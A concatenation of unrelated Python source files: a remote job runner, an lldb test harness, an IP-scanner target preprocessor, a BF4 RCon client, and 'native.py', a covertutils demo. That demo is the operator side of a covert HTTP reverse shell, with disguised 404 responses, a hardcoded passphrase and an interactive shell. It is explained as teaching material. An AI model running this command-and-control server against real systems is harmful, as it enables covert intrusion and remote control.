CalcItJobCreateError if there was an error creating the job
Arguments:
jobs -- the jobs to be processed
job_queue -- the queue to submit the jobs to
"""
total_job_count = len(jobs)
logging.info("Submitting {0:3d} jobs to the queue.".format(total_job_count))
for job_index, job in enumerate(jobs, start=1):
job_str = repr(job)
try:
command = job.cmd(global_paths)
except:
raise
else:
cmd = (job_str, command)
logging.info("Job '{0[0]:s}' added to queue. Command is '{0[1]:s}'".format(cmd))
if do_execute:
job_queue.put(cmd)
return total_job_count
def retrieve_jobs_from_queue(total_job_count, result_queue):
""" Retrieve jobs from the processing queue
Arguments:
total_job_count -- the number of jobs we expect
result_queue -- the queue to retrieve jobs from
"""
jobs_completed = 0
while jobs_completed < total_job_count:
if not do_execute:
break
job_name, time_to_complete, stdout, stderr = result_queue.get()
jobs_completed += 1
logging.info("Finished '{2:s}' ({0:d} of {1:3d}) in {3:9.2f}s.".format(jobs_completed, total_job_count, job_name, time_to_complete))
if len(stdout[:-1]) > 0:
logging.info("{0:s} STDOUT: {1:s}".format(job_name, stdout[:-1].decode('utf8')))
if not do_execute:
return
authorization_key_encoded = authorization_key.encode("utf-8")
# get hostname of running script to pass to slaves
host = socket.gethostname()
# create manager and queues
# logging.info("Creating manager".format())
server, job_queue, result_queue = start_server(port, authorization_key_encoded)
# start the slaves on the remote nodes
start_slaves(host, port, authorization_key, nodes, jobs_per_node, work_dir, remote_shell, global_paths)
try:
# send jobs to job queue
total_job_count = send_jobs_to_queue(jobs, job_queue)
# retrieve results from slaves
retrieve_jobs_from_queue(total_job_count, result_queue)
finally:
# shutdown server.
stop_server(server)
def start_server(port, authorization_key):
""" Starts the server on the master node
Arguments:
port -- Port to use for communication
authorization_key -- program secret used to identify correct server
"""
    logging.info("Starting server on port {0:d}".format(port))
manager = make_server_manager(port, authorization_key)
manager.start()
job_queue = manager.get_job_queue()
result_queue = manager.get_result_queue()
return manager, job_queue, result_queue
def stop_server(manager):
""" Stops the server on the master node when all jobs have finished
Arguments:
manager -- the server to stop
"""
logging.info("Shutting down server.")
time.sleep(MANAGER_SHUTDOWN_DELAY) # needed to prevent hanging
manager.shutdown()
def make_server_manager(port, authorization_key):
""" Create a manager for the server, listening on the given port.
Return a manager object with get_job_q and get_result_q
methods.
Arguments:
port -- Port to use for communication
authorization_key -- program secret used to identify correct server
Returns:
Manager to process jobs
"""
job_queue = Queue()
result_queue = Queue()
class JobQueueManager(multiprocessing.managers.SyncManager):
pass
JobQueueManager.register(JOB_QUEUE_NAME, callable=lambda: job_queue)
JobQueueManager.register(RES_QUEUE_NAME, callable=lambda: result_queue)
manager = JobQueueManager(address=('', port), authkey=authorization_key)
return manager
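# Hedged sketch of the matching client (slave) side. In this project the real worker
# lives in the generated slave.py template; this helper is illustrative only and shows
# how the queue names registered above are reached from a remote process.
def _example_make_client_manager(server, port, authorization_key):
    """ Connect to the job/result queues exposed by make_server_manager. """
    class ClientQueueManager(multiprocessing.managers.SyncManager):
        pass
    ClientQueueManager.register(JOB_QUEUE_NAME)
    ClientQueueManager.register(RES_QUEUE_NAME)
    manager = ClientQueueManager(address=(server, port), authkey=authorization_key)
    manager.connect()
    # A worker would then fetch jobs via getattr(manager, JOB_QUEUE_NAME)()
    return manager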
def start_slaves(server, port, authorization_key, nodes, jobs_per_node, work_dir, remote_shell, global_paths):
    """ Start slave processes on remote computers.
Arguments:
server -- the master server that the slaves connect to
      port -- the port used for communication
authorization_key -- program secret used to identify correct server
nodes -- list of nodes to use during processing
jobs_per_node -- number of jobs to start per node
work_dir -- the work directory where the slaves should be launched from
remote_shell -- the remote shell to use when connecting to nodes
global_paths -- directories used to find calcit and its data folders.
NB! This is different from the work_dir and scratch directories
in that global_paths has nothing to do with the computations themselves
"""
share_path = global_paths['share']
# write scripts to start slave nodes
write_slave_python_script(server, port, authorization_key, jobs_per_node, share_path)
slave_execute_script = write_slave_execute_script(work_dir, remote_shell, share_path)
procs = []
for node in nodes:
command_to_execute = "./{0} {1}".format(slave_execute_script, node)
logging.info("executing command '{0:s}' on node {1:s}".format(command_to_execute, node))
process = multiprocessing.Process(target=execute, args=(command_to_execute,))
procs.append(process)
process.start()
def execute(command, is_slave=False):
""" Executes command given an argument through a shell
If is_slave is True there will be a delay added through
the global constant CLIENT_RETURN_DELAY
This command will also calculate the time it took for
execution (sans CLIENT_RETURN_DELAY) and return it
Arguments:
command -- command line arguments to run a job
is_slave -- if True then the execute process will be delayed before returning
"""
t0 = numpy.asarray(time.time(),dtype=numpy.float64)
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output, error = process.communicate()
t1 = numpy.asarray(time.time(),dtype=numpy.float64)
return output, error, t1 - t0
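# Illustrative (hypothetical) usage of execute(); nothing in this script calls it this way:
#     output, error, elapsed = execute("echo hello")
#     logging.info("stdout was {0:s}, command took {1:.2f}s".format(output.decode("utf8"), elapsed))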
def write_slave_execute_script(work_dir, remote_shell, share_path):
""" Writes the slave shell script that launches worker slaves
on remote nodes.
Uses start_slaves.bash from the data directory.
TODO: make it work for other shells too.
Arguments:
work_dir -- the work directory where the slaves should be launched from
remote_shell -- the remote shell to use when connecting to nodes
share_path -- the directory of common template files
Returns:
filename of the slave shell script
"""
if remote_shell != 'ssh':
raise NotImplementedError("You specified remote shell '{0}' which is not implemented.".format(remote_shell))
filename_in = os.path.join(share_path, "start_slaves.bash")
filename_out = "start_slaves.sh"
substitutions = {'WORK_DIR': work_dir, 'REMOTE_SHELL': remote_shell}
substitute_file(filename_in, filename_out, substitutions)
os.chmod(filename_out, stat.S_IRWXU | stat.S_IRGRP | stat.S_IROTH)
return filename_out
def write_slave_python_script(server, port, authorization_key, jobs_per_node, share_path):
""" Writes the slave script that connects to the server.
Uses slave.py from the share directory.
Arguments:
server -- address of the master that the slaves connect to
port -- the port used for communication
authorization_key -- program secret used to identify correct server
jobs_per_node -- the number of jobs each node can run
share_path -- the directory of common template files
Returns:
filename of slave python script
"""
filename_in = os.path.join(share_path, "slave.py")
filename_out = "slave.py"
substitutions = {'PORT': str(port),
'HOSTNAME': server,
'AUTHKEY': authorization_key,
'JOBS_PER_NODE': str(jobs_per_node)}
substitute_file(filename_in, filename_out, substitutions)
return filename_out
|
init.py
|
import multiprocessing
import threading
import sys
from time import sleep
import os
# Some import "magic" to import from other directories; (see issue #1)
this_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(this_dir)
sys.path.insert(0, '../server/')
sys.path.insert(0, '../client') # TODO: Directory restructure; We shouldn't have to modify PYTHON_PATH
actions = ['server.py', 'client.py']
PORT = 3705
network_architecture = "mesh"
def worker(action): # Worker function
import init_server
import init_client
global network_architecture
print('action:', action)
if action == 'server.py':
print("Initializing server...")
# Apparently multiprocessing doesn't like starting things that include while loops in the main process,
# so instead, we'll start the server in a thread (of a child process of a process)
thread = threading.Thread(target=init_server.init, args=(network_architecture,))
thread.start()
print('Server has been successfully initialized')
elif action == 'client.py':
print("Initializing client...")
thread = threading.Thread(target=init_client.init)
thread.start()
print('Client has been successfully initialized')
if __name__ == '__main__':
jobs = []
for i in range(0, 2):
p = multiprocessing.Process(target=worker, args=(actions[i],))
jobs.append(p)
p.start()
sleep(1)
|
test_libsosplugin.py
|
from __future__ import print_function
import unittest
import argparse
import re
import tempfile
import subprocess
import threading
import os
import sys
import inspect
lldb = ''
clrdir = ''
workdir = ''
corerun = ''
sosplugin = ''
assembly = ''
fail_flag = ''
fail_flag_lldb = ''
summary_file = ''
timeout = 0
regex = ''
repeat = 0
def runWithTimeout(cmd):
global p
p = None
def run():
global p
p = subprocess.Popen(cmd, shell=True)
p.communicate()
thread = threading.Thread(target=run)
thread.start()
thread.join(timeout)
if thread.is_alive():
with open(summary_file, 'a+') as summary:
print('Timeout!', file=summary)
p.kill()
thread.join()
class TestSosCommands(unittest.TestCase):
def do_test(self, command):
open(fail_flag, 'a').close()
try:
os.unlink(fail_flag_lldb)
except:
pass
cmd = (('%s -b ' % lldb) +
("-k \"script open('%s', 'a').close()\" " % fail_flag_lldb) +
("-k 'quit' ") +
("--no-lldbinit ") +
("-O \"plugin load %s \" " % sosplugin) +
("-o \"script import testutils as test\" ") +
("-o \"script test.fail_flag = '%s'\" " % fail_flag) +
("-o \"script test.summary_file = '%s'\" " % summary_file) +
("-o \"script test.run('%s', '%s')\" " % (assembly, command)) +
("-o \"quit\" ") +
(" -- %s %s > %s.log 2> %s.log.2" % (corerun, assembly,
command, command)))
runWithTimeout(cmd)
self.assertFalse(os.path.isfile(fail_flag))
self.assertFalse(os.path.isfile(fail_flag_lldb))
try:
os.unlink(fail_flag)
except:
pass
try:
os.unlink(fail_flag_lldb)
except:
pass
def t_cmd_bpmd_nofuturemodule_module_function(self):
self.do_test('t_cmd_bpmd_nofuturemodule_module_function')
def t_cmd_bpmd_module_function(self):
self.do_test('t_cmd_bpmd_module_function')
def t_cmd_bpmd_module_function_iloffset(self):
self.do_test('t_cmd_bpmd_module_function_iloffset')
def t_cmd_bpmd_methoddesc(self):
self.do_test('t_cmd_bpmd_methoddesc')
def t_cmd_bpmd_clearall(self):
self.do_test('t_cmd_bpmd_clearall')
def t_cmd_clrstack(self):
self.do_test('t_cmd_clrstack')
def t_cmd_clrthreads(self):
self.do_test('t_cmd_clrthreads')
def t_cmd_clru(self):
self.do_test('t_cmd_clru')
def t_cmd_dumpclass(self):
self.do_test('t_cmd_dumpclass')
def t_cmd_dumpheap(self):
self.do_test('t_cmd_dumpheap')
def t_cmd_dumpil(self):
self.do_test('t_cmd_dumpil')
def t_cmd_dumplog(self):
self.do_test('t_cmd_dumplog')
def t_cmd_dumpmd(self):
self.do_test('t_cmd_dumpmd')
def t_cmd_dumpmodule(self):
self.do_test('t_cmd_dumpmodule')
def t_cmd_dumpmt(self):
self.do_test('t_cmd_dumpmt')
def t_cmd_dumpobj(self):
self.do_test('t_cmd_dumpobj')
def t_cmd_dumpstack(self):
self.do_test('t_cmd_dumpstack')
def t_cmd_dso(self):
self.do_test('t_cmd_dso')
def t_cmd_eeheap(self):
self.do_test('t_cmd_eeheap')
def t_cmd_eestack(self):
self.do_test('t_cmd_eestack')
def t_cmd_gcroot(self):
self.do_test('t_cmd_gcroot')
def t_cmd_ip2md(self):
self.do_test('t_cmd_ip2md')
def t_cmd_name2ee(self):
self.do_test('t_cmd_name2ee')
def t_cmd_pe(self):
self.do_test('t_cmd_pe')
def t_cmd_histclear(self):
self.do_test('t_cmd_histclear')
def t_cmd_histinit(self):
self.do_test('t_cmd_histinit')
def t_cmd_histobj(self):
self.do_test('t_cmd_histobj')
def t_cmd_histobjfind(self):
self.do_test('t_cmd_histobjfind')
def t_cmd_histroot(self):
self.do_test('t_cmd_histroot')
def t_cmd_sos(self):
self.do_test('t_cmd_sos')
def t_cmd_soshelp(self):
self.do_test('t_cmd_soshelp')
def generate_report():
report = [{'name': 'TOTAL', True: 0, False: 0, 'completed': True}]
fail_messages = []
if not os.path.isfile(summary_file):
print('No summary file to process!')
return
with open(summary_file, 'r') as summary:
for line in summary:
if line.startswith('new_suite: '):
report.append({'name': line.split()[-1], True: 0, False: 0,
'completed': False, 'timeout': False})
elif line.startswith('True'):
report[-1][True] += 1
elif line.startswith('False'):
report[-1][False] += 1
elif line.startswith('Completed!'):
report[-1]['completed'] = True
elif line.startswith('Timeout!'):
report[-1]['timeout'] = True
elif line.startswith('!!! '):
fail_messages.append(line.rstrip('\n'))
for suite in report[1:]:
report[0][True] += suite[True]
report[0][False] += suite[False]
report[0]['completed'] &= suite['completed']
for line in fail_messages:
print(line)
print()
print('=' * 79)
print('{:68} {:>10}'.format('Test suite', 'Result'))
print('-' * 79)
for suite in report[1:]:
if suite['timeout']:
result = 'Timeout'
elif suite[False]:
result = 'Fail'
elif not suite['completed']:
result = 'Crash'
elif suite[True]:
result = 'Success'
else:
result = 'Please, report'
print('{:68} {:>10}'.format(suite['name'], result))
print('=' * 79)
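# For reference, a summary file parsed by generate_report() might look roughly
# like the following (illustrative only; the real content is written by
# testutils from inside lldb):
#     new_suite: t_cmd_clrstack
#     True
#     True
#     Completed!
#     new_suite: t_cmd_dumpheap
#     False
#     !!! AssertionError: unexpected output
#     Timeout!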
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--lldb', default='lldb')
parser.add_argument('--clrdir', default='.')
parser.add_argument('--workdir', default='.')
parser.add_argument('--assembly', default='Test.exe')
parser.add_argument('--timeout', default=90)
parser.add_argument('--regex', default='t_cmd_')
parser.add_argument('--repeat', default=1)
parser.add_argument('unittest_args', nargs='*')
args = parser.parse_args()
lldb = args.lldb
clrdir = args.clrdir
workdir = args.workdir
assembly = args.assembly
timeout = int(args.timeout)
regex = args.regex
repeat = int(args.repeat)
print("lldb: %s" % lldb)
print("clrdir: %s" % clrdir)
print("workdir: %s" % workdir)
print("assembly: %s" % assembly)
print("timeout: %i" % timeout)
print("regex: %s" % regex)
print("repeat: %i" % repeat)
corerun = os.path.join(clrdir, 'corerun')
sosplugin = os.path.join(clrdir, 'libsosplugin.so')
if os.name != 'posix':
print('Not implemented: corerun.exe, sosplugin.dll?')
exit(1)
print("corerun: %s" % corerun)
print("sosplugin: %s" % sosplugin)
fail_flag = os.path.join(workdir, 'fail_flag')
fail_flag_lldb = os.path.join(workdir, 'fail_flag.lldb')
print("fail_flag: %s" % fail_flag)
print("fail_flag_lldb: %s" % fail_flag_lldb)
summary_file = os.path.join(workdir, 'summary')
print("summary_file: %s" % summary_file)
try:
os.unlink(summary_file)
except:
pass
sys.argv[1:] = args.unittest_args
suite = unittest.TestSuite()
all_tests = inspect.getmembers(TestSosCommands, predicate=lambda m: inspect.isfunction(m) or inspect.ismethod(m))
for (test_name, test_func) in all_tests:
if re.match(regex, test_name):
suite.addTest(TestSosCommands(test_name))
unittest.TextTestRunner(verbosity=1).run(suite)
generate_report()
|
preprocessing.py
|
import re
import os
from urllib.parse import urlparse
import dns.resolver
import dns.rdtypes.IN.A
from IPy import IP
from itertools import chain
from concurrent.futures import ThreadPoolExecutor
from redisqueue.scheduler import DupeFilterScheduler
import importlib
import six
import time
from redisqueue import connection
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
IPADDR_PATTERN = re.compile(r'(?:\d+\.){3}\d+')
DOMAIN_PATTERN = re.compile(r'(?:\w+\.){1,}\w+')
IPADDR_FIELD_PATTERN = re.compile(r'(?:\d+\.){3}\d+[-~](?:\d+\.){3}\d+')
class Preprocessing(DupeFilterScheduler, FileSystemEventHandler):
"""
Preprocess incoming data before it is enqueued: validate the format, resolve URLs via DNS, deduplicate IPs, and by default automatically enqueue the class C (/24) network that each IP belongs to.
"""
def __init__(self, server,
persist=False,
flush_on_start=False,
queue_key='queue:%(timestamp)s' % {'timestamp': int(time.time())},
queue_cls='redisqueue.rqueues.FifoQueue',
dupefilter_key='dupefilter:%(timestamp)s' % {'timestamp': int(time.time())},
dupefilter_cls='redisqueue.dupefilter.RFPDupeFilter',
dupefilter_debug=False,
idle_before_close=0,
serializer=None,
subnet_mask=32):
"""Initialize scheduler.
Parameters
----------
subnet_mask : int
Prefix length of the network each IP is expanded into before being enqueued; the default of 32 enqueues only the address itself rather than its class C network.
"""
super().__init__(server, persist, flush_on_start, queue_key, queue_cls, dupefilter_key, dupefilter_cls, dupefilter_debug, idle_before_close, serializer)
self.subnet_mask = subnet_mask
@classmethod
def from_settings(cls, settings):
kwargs = {
'persist': settings.get('SCHEDULER_PERSIST', True),
'flush_on_start': settings.get('SCHEDULER_FLUSH_ON_START', False),
'queue_key': settings.get('SCHEDULER_QUEUE_KEY', 'queue:%(timestamp)s' % {'timestamp': int(time.time())}),
'queue_cls': settings.get('SCHEDULER_QUEUE_CLASS', 'redisqueue.rqueues.FifoQueue'),
'dupefilter_key': settings.get('SCHEDULER_DUPEFILTER_KEY', 'dupefilter:%(timestamp)s' % {'timestamp': int(time.time())}),
'dupefilter_cls': settings.get('SCHEDULER_DUPEFILTER_CLASS', 'redisqueue.dupefilter.RFPDupeFilter'),
'dupefilter_debug': settings.get('SCHEDULER_DUPEFILTER_DEBUG', False),
'idle_before_close': settings.get('SCHEDULER_IDLE_BEFORE_CLOSE', 0),
'serializer': settings.get('SCHEDULER_SERIALIZER', None),
'subnet_mask': settings.get('SUBNET_MASK', 32)
}
# Support serializer as a path to a module.
if isinstance(kwargs.get('serializer'), six.string_types):
kwargs['serializer'] = importlib.import_module(kwargs['serializer'])
server = connection.from_settings(settings)
# Ensure the connection is working.
server.ping()
return cls(server=server, **kwargs)
def dns_resolve(self, domain):
"""将域名解析成地址段
@param domain: 域名
@type domain: str
@return: 地址段生成器
@rtype : generator
"""
try:
a = dns.resolver.query(domain, 'A').response.answer
# Even when querying only A records, the answer may still contain dns.rdtypes.ANY.CNAME.CNAME entries, so keep only items that are dns.rdtypes.IN.A.A
resolve_result = (j.address for i in a for j in i.items if isinstance(j, dns.rdtypes.IN.A.A))
ips = (ip for ip_net in (IP(ip).make_net(self.subnet_mask) for ip in resolve_result) for ip in ip_net)
except Exception:
ips = []
finally:
return ips
def regulate(self, address_range):
"""将不规范的地址段转换成单个ip的序列
:address_range: str
:returns: list
"""
if IPADDR_FIELD_PATTERN.search(address_range):
ip1_str, ip2_str = re.split('[-~]', address_range)
else:
raise ValueError('IP Address format was invalid')
ip1 = IP(ip1_str)
ip2 = IP(ip2_str)
length = abs(ip1.int() - ip2.int())
start_int = ip1.int() if ip1.int() < ip2.int() else ip2.int()
ips = []
for i in range(length+1):
ips.append(IP(start_int+i))
return ips
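# Example (illustrative): regulate('10.0.0.1-10.0.0.3') returns
# [IP('10.0.0.1'), IP('10.0.0.2'), IP('10.0.0.3')]; a '~' separator works as well.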
def ip_resolve(self, url_like):
"""解析IP地址字符串,
- 如果是/32地址则将该地址字符串转换为所在C段所有地址
- 如果是地址段,则返回该地址段所有地址
- 其他格式则抛出异常
@param url_like: 类似url格式的字符串
@type : str
@return: 地址段生成器
@rtype : generator
@raise e: 地址格式错误
"""
try:
ip = IP(url_like)
except ValueError:
ip = self.regulate(url_like)
if len(ip) > 1:
return (x for x in ip)
else:
return (x for x in ip.make_net(self.subnet_mask))
def resolve_single(self, url_like):
parse_result = urlparse(url_like)
hostname = parse_result.hostname
if hostname:
try:
ips = self.ip_resolve(hostname)
except ValueError:
ips = self.dns_resolve(hostname)
else:
try:
ips = self.ip_resolve(url_like)
except ValueError:
searched_ip = IPADDR_PATTERN.search(url_like)
searched_domain = DOMAIN_PATTERN.search(url_like)
if searched_ip:
ips = self.ip_resolve(searched_ip.group(0))
elif searched_domain:
ips = self.dns_resolve(searched_domain.group(0))
else:
ips = []
self.logger.info(f'unrecognised input format: {url_like}')
for ip in ips:
if self.enqueue(str(ip)):
self.logger.info(f'produce:{ip}')
def resolve_bulk(self, url_like_l, n=30):
with ThreadPoolExecutor(n) as pool:
pool.map(self.resolve_single, url_like_l)
def on_created(self, event):
try:
self.logger.info(f"found file {event.src_path} created!")
with open(event.src_path, encoding='utf8') as f:
data = (row.split(',')[0].strip() for row in f.readlines() if row.strip())
self.resolve_bulk(data)
except Exception as e:
self.logger.info(e)
def main(settings):
"""测试代码
:returns: TODO
"""
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(name)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S')
p = Preprocessing.from_settings(settings)
p.open()
path = os.path.abspath(settings.get('INPUT_PATH', '.'))
if not os.path.exists(path):
os.makedirs(path)
p.logger.info(f"开始监控文件夹:{path}")
observer = Observer()
observer.schedule(p, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
p.close()
if __name__ == "__main__":
settings = {'REDIS_HOST': '127.0.0.1',
'REDIS_PORT': 6888,
'SCHEDULER_SERIALIZER': 'json',
'SCHEDULER_QUEUE_KEY': 'digholes:queue_ip_pool',
'SCHEDULER_DUPEFILTER_KEY' : 'digholes:dupefilter',
'INPUT_PATH': 'input',
}
# from multiprocessing import Process
# p = Process(target=main, args=(settings,))
# p.start()
# p.join()
main(settings)
|
native.py
|
#!/usr/bin/python3
# Disclaimer!
# This code is not an optimal HTTP reverse shell!
# It is created to introduce as many aspects of 'covertutils' as possible.
# There are muuuuuch better ways to implement a reverse HTTP shell using this package,
# using many Python helpers like SimpleHTTPServer.
# In this file the HTTP requests/responses are crafted in socket level to display
# the concept of 'StegoOrchestrator' class and network wrapper functions
from covertutils.handlers import ResponseOnlyHandler
#from covertutils.orchestration import StegoOrchestrator
from covertutils.orchestration import SimpleOrchestrator
from covertutils.datamanipulation import asciiToHexTemplate
from covertutils.shells.impl import StandardShell, ExtendableShell
from time import sleep
from os import urandom
import random
import string
import sys
import socket
from threading import Thread
#============================== HTTP Steganography part ===================
resp_ascii = '''HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Win32)
Content-Length: 363
Connection: Closed
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body>
<!-- Reference Code: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-->
</html>
'''
resp_templ = asciiToHexTemplate( resp_ascii )
# qa85b923nm90viuz12.securosophy.com
req_ascii = '''GET /search.php?q=~~~~~~~~?userid=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.1
Host: {0}
Cookie: SESSIOID=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eTag: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
User-Agent: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
''' # 2 new lines terminate the HTTP Request
req_templ = asciiToHexTemplate( req_ascii )
# Create the StegoOrchestrator configuration string
stego_config = '''
X:_data_:\n\n
resp = """%s"""
req = """%s"""
''' % ( resp_templ, req_templ )
#==========================================================================
#============================== Handler Overriding part ===================
# It is an HTTP Server, so it has to send data only when requested.
# Hence the use of the 'ResponseOnlyHandler' which sends data only when 'onMessage()' is hit with the self.request_data message
class MyHandler ( ResponseOnlyHandler ) : #
# Overriding the original onMessage method to send a response in any case - not only when the 'ResponseOnlyHandler.request_data' message arrives
def onMessage( self, stream, message ) :
# If the Parent Class would respond (the message was a request), don't bother responding
responded = super( MyHandler, self ).onMessage( stream, message )
if not responded : # If the message was real data (not 'ResponseOnlyHandler.request_data' string), the Parent Class didn't respond
self.queueSend("X", 'heartbeat'); # Make it respond anyway with 'X' (see Client)
responded = super( MyHandler, self ).onMessage( stream, message )
assert responded == True # This way we know it responded!
# The PrintShell class will automatically handle the response (print it to the user)
def onChunk( self, stream, message ) :
if message : return # If this chunk is the last and message is assembled let onMessage() handle it
# print "[*] Got a Chunk"
self.onMessage( 'heartbeat', self.request_data ) # If this is a message chunk, treat it as a 'request_data' message
def onNotRecognised( self ) :
# print "[!]< Unrecognised >"
# If someone that isn't the client sends an HTTP Request
redirection_http='''
HTTP/1.1 302 Found
Server: Apache/2.2.14 (Win32)
Location: http://securosophy.com
Content-Length: 0
Content-Type: text/plain
Content-Language: el-US
Connection: close
''' # The response will be a redirection
send( redirection_http ) #
# This way all random connections will get redirected to "securosophy.com" blog
#==========================================================================
#============================== Networking part =========================
# The networking is handled by Python API. No 'covertutils' code here...
addr = ("0.0.0.0", int( sys.argv[1]) ) # The Listening Address tuple
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Listening socket
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Free the socket object directly after process finishes
server_socket.bind( addr ) # Handling Networking
server_socket.listen(5) # independently of covertutils
# HTTP Servers work like:
# Client (Socket Opens) Server
# Client ------SYN-----> Server
# Client <---SYN-ACK---- Server
# Client ------ACK-----> Server
# Client (HTTP Request) Server
# Client --------------> Server
# Client (HTTP Response) Server
# Client <-------------- Server
# Client (Socket Close) Server
# Client <-----FIN------ Server
# Client ----FIN-ACK---> Server
# Client <-----ACK------ Server
# As this happens for every HTTP Request/Response the 'send' and 'recv' functions
# use spin-locks to block and recognise when they can transfer data.
# 'send' and 'recv' are wrappers for Handler object networking. Covertutils is network agnostic
client = None # Globally define the client socket
client_addr = None
def recv () :
global client
while not client : continue # Wait until there is a client
ret = ''
while not ret : # Block until all data is received
ret = client.recv( 2048 )
return ret # Return the received data
def send( raw ) :
global client
while not client : continue # Wait until there is a client
client.send( raw ) # Send the data through the socket
client.shutdown(socket.SHUT_RDWR) # Terminate the Socket
#==========================================================================
#=============================Handler Creation============================
passphrase = "App1e5&0raNg3s" # This is used to generate encryption keys
#orch = StegoOrchestrator( passphrase,
# stego_config = stego_config,
# main_template = "resp", # The template to be used
# hex_inject = True, # Inject data in template in hex mode
# streams = ['heartbeat'],
# )
orch = SimpleOrchestrator( passphrase, # Encryption keys generated from the passphrase
tag_length = 2, # The tag length in bytes
out_length = 52, # The absolute output byte length (with tags)
in_length = 52, # The absolute input byte length (with tags)
streams = ['heartbeat'], # Stream 'control' will be automatically added as failsafe mechanism
reverse = True ) # Reverse the encryption channels - Agent has `reverse = False`
handler = MyHandler( recv, send, orch ) # Instantiate the Handler Object using the network wrappers
def serveForever() :
global client
global client_addr
while True : # Make it listen `hard`
client_new, client_addr = server_socket.accept()
client = client_new
server_thread = Thread ( target = serveForever )
server_thread.daemon = True
server_thread.start()
#==========================================================================
#============================== Shell Design part ========================
shell = ExtendableShell( handler,
prompt = "[Sabre] > ",
ignore_messages = set(['X']) # It is also the default argument in BaseShell
)
shell.start()
#==========================================================================
# Magic!
|
app.py
|
########################
# made by ResupinePuma
# for bf4 community
########################
import json, requests, re, random
import socket
from threading import Thread
from bf_anticrasher.frostbite_rcon_utils import *
from bf_anticrasher.config import *
import datetime
class RCon():
def __init__(self, address, password):
self.ip = address[0]
self.port = address[1]
self.password = password
self.connection = None
self.events = {}
self.listener = None
def connect(self):
try:
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.connection.settimeout(1)
self.connection.connect((self.ip, self.port))
self.connection.setblocking(1)
packet_to_send = encode_packet(create_packet(0, False, False, ['login.plainText', self.password]))
self.connection.send(packet_to_send)
data_buffer = bytes()
while not contains_complete_packet(data_buffer):
data_buffer += self.connection.recv(2048)
packet_to_send = encode_packet(create_packet(0, False, False, ['admin.eventsEnabled', 'True']))
self.connection.send(packet_to_send)
data_buffer = bytes()
while not contains_complete_packet(data_buffer):
data_buffer += self.connection.recv(2048)
packet = decode_packet(data_buffer)
#print(packet)
if b"OK" in packet['words']:
return True
else:
raise Exception(packet['words'][0].decode("utf-8"))
except Exception as ex:
raise ex
def Command(self, command:str):
packet_to_send = encode_packet(create_packet(0, False, False, command.split(" ")))
self.connection.send(packet_to_send)
data_buffer = bytes()
while not contains_complete_packet(data_buffer):
data_buffer += self.connection.recv(2048)
packet = decode_packet(data_buffer)
return [w.decode("utf-8") for w in packet['words'] if not type(w) == int]
def __DecodeEvent(self, event):
event['words'] = [w.decode("utf-8") for w in event['words'] if not type(w) == int]
event = event['words']
if event[0] in self.events.keys():
funk = self.events[event[0]]
event.pop(0)
funk(event)
def StartEventListener(self):
def listen():
while True:
data_buffer = bytes()
while not contains_complete_packet(data_buffer):
# if b'punkBuster' in self.connection.recv(2048):
# continue
#print(self.connection.recv(2048))
data_buffer += self.connection.recv(16384)
packet = decode_packet(data_buffer)
Thread(target=self.__DecodeEvent, args=[packet]).start()
#self.__DecodeEvent(packet['words'])
self.listener = Thread(name="Listener", target=listen)
self.listener.start()
def CloseConnection(self):
self.listener._delete()
self.connection.close()
class Session(requests.Session):
def __init__(self, **kwargs):
self._proxylist = self.gen_proxylist()
super().__init__(**kwargs)
self.proxies.update(random.choice(self._proxylist))
def gen_proxylist(self):
#text = requests.get("https://spys.me/proxy.txt").text.replace("\n","=")
#return [{"http" : f"http://{u}", "https" : f"http://{u}"} for u in re.findall(r"=([0-9.:]+)", text)]
return [{"http" : None, "https" : None}]
def request(self, method, url, **kwargs):
while True:
try:
response = super().request(method, url, **kwargs)
if response.status_code == 200:
return response
else:
raise Exception()
except Exception as ex:
print(ex)
self._proxylist.remove(self.proxies)
if len(self._proxylist) == 0:
self._proxylist = self.gen_proxylist()
self.proxies.update(random.choice(self._proxylist))
raise Exception("Retries limit exceeded")
session = Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/68.0",
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Connection":"keep-alive",
"Upgrade-Insecure-Requests": "1"
})
def GetUserInfo(username, debug=False):
"""
Returns
---------
personaId : int
Battlelog persona id of the player
good : bool
True if the player's stats look legitimate, False if they look like a crasher's
username : str
username
"""
res = session.post(url=f"https://battlelog.battlefield.com/{bf}/search/query/", data=f"query={username}").json()
#a = json.loads(res.text)
personaId = [d["personaId"] for d in res.get('data', []) if d.get('personaName', "") == username][-1]
if not personaId:
return Exception("User not found")
else:
personaId = int(personaId)
bflist = {
